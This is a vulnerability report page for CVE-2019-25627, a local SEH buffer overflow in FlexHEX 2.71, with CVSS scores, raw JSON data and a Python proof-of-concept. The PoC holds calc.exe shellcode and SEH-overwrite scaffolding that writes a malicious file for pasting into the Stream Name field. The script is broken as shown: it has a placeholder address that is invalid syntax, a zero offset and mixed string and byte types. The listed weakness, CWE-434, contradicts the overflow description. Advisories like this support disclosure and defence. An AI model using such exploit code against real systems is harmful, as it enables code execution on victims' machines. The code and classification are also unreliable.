Security Vulnerability Report
CVE-2019-25627 CVSS 8.4 HIGH

Published: 2026-03-24 12:16:03
Last Modified: 2026-04-15 16:10:02

Description

FlexHEX 2.71 contains a local buffer overflow vulnerability in the Stream Name field that allows local attackers to execute arbitrary code by triggering a structured exception handler (SEH) overflow. Attackers can craft a malicious text file with carefully aligned shellcode and SEH chain pointers, paste the contents into the Stream Name dialog, and execute arbitrary commands like calc.exe when the exception handler is triggered.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:flexhex:flexhex:2.71:*:*:*:*:*:*:* - VULNERABLE
FlexHEX 2.71

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/python
# -*- coding: utf-8 -*-
# PoC for CVE-2019-25627 (FlexHEX SEH Overflow)
# Generates a malicious file to trigger the buffer overflow.

import sys

# Bad characters check might be required depending on the context
# Shellcode to execute calc.exe (windows/exec CMD=calc.exe)
shellcode = ("\xd9\xc5\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a"
"\x49\x4b\x4c\x4a\x48\x4b\x39\x43\x30\x45\x50\x45\x50\x4c"
"\x49\x4b\x55\x46\x51\x48\x52\x42\x44\x4c\x4b\x50\x52\x50"
"\x30\x4c\x4b\x47\x32\x44\x4c\x4c\x4b\x51\x42\x44\x54\x4c"
"\x4b\x50\x52\x46\x50\x4c\x4b\x51\x5a\x47\x4c\x4e\x6b\x42"
"\x46\x4c\x4b\x44\x4c\x50\x34\x54\x54\x4c\x4b\x50\x53\x50"
"\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x44\x4e\x6b\x43\x31\x4a"
"\x4e\x46\x51\x49\x50\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
"\x57\x49\x54\x48\x41\x4b\x51\x4b\x45\x31\x51\x59\x43\x6a"
"\x56\x31\x4b\x4f\x4d\x30\x50\x58\x43\x30\x43\x30\x45\x50"
"\x4c\x4b\x42\x38\x44\x58\x4c\x49\x4b\x4f\x49\x70\x4e\x75"
"\x49\x50\x42\x4e\x42\x46\x42\x36\x43\x66\x4a\x48\x46\x49"
"\x4d\x50\x4f\x4d\x4e\x4b\x4f\x49\x46\x46\x33\x46\x33\x50"
"\x32\x45\x38\x45\x51\x4c\x4b\x50\x4f\x4e\x36\x50\x50\x56"
"\x30\x4c\x4b\x47\x36\x46\x50\x4e\x6b\x42\x50\x44\x4c\x4c"
"\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45\x58\x4b"
"\x4f\x48\x55\x4c\x4f\x4f\x4f\x48\x59\x4f\x4f\x4f\x48\x59"
"\x43\x30\x45\x50\x43\x58\x44\x47\x42\x53\x46\x52\x51\x4f"
"\x50\x52\x43\x30\x51\x53\x51\x43\x47\x33\x43\x43")

# Payload construction structure
# Note: Offsets need to be determined via debugging (e.g., using pattern_create.rb)
offset = 0  # Replace with actual offset to SEH handler
nseh = b"\xeb\x06\x90\x90"  # Short jump to shellcode
seh = b"\xXX\xXX\xXX\xXX"  # POP POP RET address (replace with valid address)
padding = b"\x90" * 16  # NOP sled before shellcode

# Generate the malicious buffer
buffer = b"A" * offset + nseh + seh + padding + shellcode

try:
    print("[*] Creating malicious payload file...")
    with open("exploit.txt", "wb") as f:
        f.write(buffer)
    print("[+] File 'exploit.txt' created successfully.")
    print("[*] Paste the content of this file into the FlexHEX Stream Name field.")
except Exception as e:
    print(f"[-] Error creating file: {e}")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25627", "sourceIdentifier": "[email protected]", "published": "2026-03-24T12:16:02.560", "lastModified": "2026-04-15T16:10:01.797", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FlexHEX 2.71 contains a local buffer overflow vulnerability in the Stream Name field that allows local attackers to execute arbitrary code by triggering a structured exception handler (SEH) overflow. Attackers can craft a malicious text file with carefully aligned shellcode and SEH chain pointers, paste the contents into the Stream Name dialog, and execute arbitrary commands like calc.exe when the exception handler is triggered."}, {"lang": "es", "value": "FlexHEX 2.71 contiene una vulnerabilidad local de desbordamiento de búfer en el campo Stream Name que permite a atacantes locales ejecutar código arbitrario al desencadenar un desbordamiento del gestor de excepciones estructuradas (SEH). Los atacantes pueden crear un archivo de texto malicioso con shellcode y punteros de cadena SEH cuidadosamente alineados, pegar el contenido en el diálogo Stream Name, y ejecutar comandos arbitrarios como calc.exe cuando se desencadena el gestor de excepciones."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": 
"NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flexhex:flexhex:2.71:*:*:*:*:*:*:*", "matchCriteriaId": 
"973521E2-9B32-4B7E-AE6F-3A5406A9C7C7"}]}]}], "references": [{"url": "http://www.flexhex.com", "source": "[email protected]", "tags": ["Broken Link", "Product"]}, {"url": "http://www.flexhex.com/download/flexhex_setup.exe", "source": "[email protected]", "tags": ["Broken Link", "Product"]}, {"url": "https://www.exploit-db.com/exploits/46665", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/flexhex-local-buffer-overflow-via-seh-unicode", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}